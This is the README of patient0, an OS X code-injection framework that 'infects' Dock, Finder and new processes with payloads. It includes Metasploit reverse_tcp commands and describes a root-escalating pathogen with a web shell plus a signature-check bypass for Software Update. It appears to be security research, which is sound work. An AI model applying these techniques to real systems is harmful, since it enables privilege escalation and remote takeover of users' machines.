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May 2009                              Will Drewry <[email protected]>
                                      Released under a BSD-style license
                                      `cat ./LICENSE`

What is [patient0]?

[patient0] provides a foundation for exploring trust relationships between the user, running processes, and privileges on OS X using runtime code injection and function interposition. In particular, [patient0] is a tool for performing widespread process 'infection' by making key applications, like Dock and Finder, spread the custom code. [patient0] is built on [libpatient0].

[libpatient0] provides a lightweight framework for creating and interacting with processes on a given OS X x86 system. Its provided functionality includes the following:

  • function interposition through lazy and stub jump table patching
  • process spawning with task port retention
  • bundle injection in to running processes
  • process listing and simple searching

None of these techniques are new, but until now, have not been collected in to a centralized location. In addition, the reference implementation, [patient0] supplies features which make process behavior exploration even easier:

  • 'intercepts' LaunchServices-related calls
  • 'infects' all new processes with a given mach-o bundle on launch

This means that an arbitrary bundle can be injected in to all new processes started from a [patient0]-process, like Dock, Finder, or SystemUIServer, The arbitrary bundle to be injected, or pathogen, will follow a simple form, but will otherwise be free to perform whatever actions desired. [rubella] is the primary example included (pathogens/rubella).

How does it work?

[patient0] relies on two specific capabilities in OS X:

  1. A given process's mach task port can be sent to any other process
  2. A process's mach task port doesn't change on exec (except s-bit binaries)

This means that any arbitrary executable (that then doesn't fork()/daemonize()) may be started while its task port is retained. In our case, we send the task port back to the parent process. [libpatient0] provides this functionality in patient0/spawn.h. With this functionality, we can quickly restart an application as an infected one -- especially an application that doesn't usually have mandatory arguments or specific user-state, like the Dock.

Once we have something like the Dock acting as [patient0], any process launch requests can be intercepted using lazy-function interposition. The interposition will result in the requested program being launched with the task port retained in the [patient0] process. The [patient0] process will then infect the new process be infected with a given pathogen (using [patient0/infect.h]).

One of the many interesting side effects of process infection is that it gives access to a number of features that other platforms don't always have. For instance, an infected Software Update may allow for unsigned package installation (see swineflu). Or, worse, when an unprivileged process asks the Authorization for rights, those rights will become accessible to the attached pathogen code allowing for privileged execution after the user has authenticated for what they believed to be a normal, trusted action: preference pane unlocking, screensaver unlocking(*), etc.

(*) The screensaver is normally launched by the user's launchd process. However, the ScreenSaverEngine can be spawned independently.


[patient0] may be used for further development, standalone, or as a metasploit payload.


See the Components section.


The initial infection is handled by the syringe program. It will inject a patient0 bundle in to the given application

make syringe
./syringe pathogen.bundle [<pid> </path/to/binary>]

This will run syringe and infect the Dock, SystemUIServer, and Finder unless a process id and path is specified. If one of the given arguments are supplied, only that process will be infected.

(Adding support for arbitrary pathogen injection is on the short todo list.)


In order to use patient0 with Metasploit, run the following build command and follow the instructions on the screen:

make metasploit

With the files in place, you can inject patient0 with rubella into a vulnerable application. The payload is sent and injected over a reverse TCP connection which is not maintained:

msf> use exploit/osx/browser/awesome
msf[awesome]> set payload osx/x86/rubella/reverse_tcp
msf[awesome]> set SRVPORT=8080
msf[awesome]> set LHOST= # this machine
msf[awesome]> exploit
... wait ...

Currently, rubella doesn't phone home. However, it can run an arbitrary Tcl script. Currently, that script is web.tcl. It binds to port 8081 and listens for a connection. Any bundle or Tcl script can be injected. The approach is convoluted, but flexible enough (for now).

See the section below on rubella for a bit more detail and an example usecase.




The spawn components provides utility functions for starting a process while retaining its mach task port which may be used by the infection component below.


The infect component provides utility functions for injecting a bundle in to a running process using its mach task. This uses a modified version of Dino Dai Zovi's inject_bundle.s from the Metasploit project.


The process component provides utility functions for interacting with the currently running processes on the system prior to acquiring task handles.


The runtime component provides a few helper functions foruse when writing pathogens. For instance, you may want to avoid exitting ungracefully when your bundle runtime exits. To avoid this, you can deadlock it with runtime_deadlock();


The log component contains simple p0_logf macros for easy logging without polluting the namespace too badly.


The mach_jump component provides utility functions for interacting with the running process's jump_table section. It allows for easily reversible and robust function interposition (hijacking) of any function supplied by an external library (for the most part). In addition, it provides some functions for walking the Mach-O symbol table to perform name-based jump_table entry resolution. Additional (dodgier) functionality can be found by looking around include/patient0/mach_jump/*.h.


patient0, as a bundle, encapsulates the above functionality in to one library and adds a runtime on top of it. The runtime is accessed by calling:

void run(void *self, size_t size)

The supplementary bundle will attempt to be read from self+size-4 where a 4 byte unsigned integer is expected to then be preceded by the bundle. This secondary bundle is the actual infection and will be spread to other launched processes (along with patient0).

patient0 is acts as a pathogen superspreader. It should be injected in to processes that are responsible for interacting with users to launch processes, like Dock, Finder, and the SystemUIServer, as per earlier discussion.

patient0 intercepts LSOpenRefFromSpec to replace calls to ensure infection. Currently, only opening .app's is supported.


syringe is the standalone program which will respawn a given process and inject patient0 and a specified bundle into it. See usage above.

There is also a syringe bundle which is compatible with metasploit's inject_bundle payload. This will inject patient0 and a bundle (read over the wire) into the Dock and Finder.


Pathogens are plugins for patient0. They are the code that is spread when patient0 infects a process.


rubella is the primary example of a pathogen built on the patient0 framework. It interposes the Authorization functions to determine when an infected process has attempted to acquire privileged credentials. If system.privilege.admin was not requested, it will be added to the rights list (in AuthorizationCopyRights). Once system.privilege.admin privileges have been received, rubella will spawn a ruby shell with root privileges via AuthorizationExecuteWithPrivileges and execute the pivot.rb code along with a custom payload. It will inject this custom payload into the launchd thereby escalating the rubella-owner to root.

The example payload is web.tcl. This will bind a simple web server to port 8081 which allows for arbitrary shell commands to be submitted to launchd for execution.

To demo this, infect your Dock, etc with patient0+rubella. Then open your system preferences (from the Dock). Click on a pane that has a lock (like Accounts). Unlock the lock. Then browse to


swineflu intercepts all call to CSSM_VerifyData making them all return successful. In addition, it imports all patient0 functionality and will infect any processes launched from processes it is in. It is particularly effective at making a spawned Software Update instance allow for unsigned package installation.

(Not done yet)


Future work, TODOs, etc

  • add automatic symbol stub patching on dynamic image addition (_register*)
  • add automatic symbol stub patching for loaded libraries by crawling load commands
  • determine if runner or Installer is calling AuthorizationCopyRights
  • write real tests
  • fully comment all libpatient0 functions (doxygen would be a bonus)
  • add an injectable debugger thread (base a simple debugger on pivot.rb)
  • add an injectable local process stats thread
  • add more file types to patient0 and clean up the code
  • determine how Software Update is invoked from the menu and intercept it: LaunchApplicationViaLaunchD, _LSLaunchApplication< _LSOpenItemsWithHandler_CFDictionaryApplier, LSOpenFromURLSpec
  • integrate into mac-meterpreter.
  • look into passing a custom bootstrap port/namespace to have access to exception handler ports.
  • port the remainder of the patient0 functionality into pivot.rb.
  • add a pathogen which passes the open fd to the dock with a reverse session that allows for task port accruing.
  • make rubella disable further injection if it has been successful once.
  • Add SoftwareUpdate respawn support to swineflu to infect any launched instance.
  • look into authorizationdb tweaks, etc
  • make a self-hosted software update spoof server/proxy
  • overriding CSSM_VerifyDat and CFURLCreateDataAndPropertiesFromResource to automatically provide a fake Software Update server to software update processes and disable the package signature checks.
  • look into the behavior of runtike injection into processes signed by Apple with the SecTask=allowed(,safe) option and then request system.privilege.taskport access:
    • E.g., LeakAgent(32|64)
  • look into how taskgated port allocations are handled (does it have to be root?) and if SecCodeCheckValidity could be overriden if not.


Runtime code injection suite for exploring OS X process security







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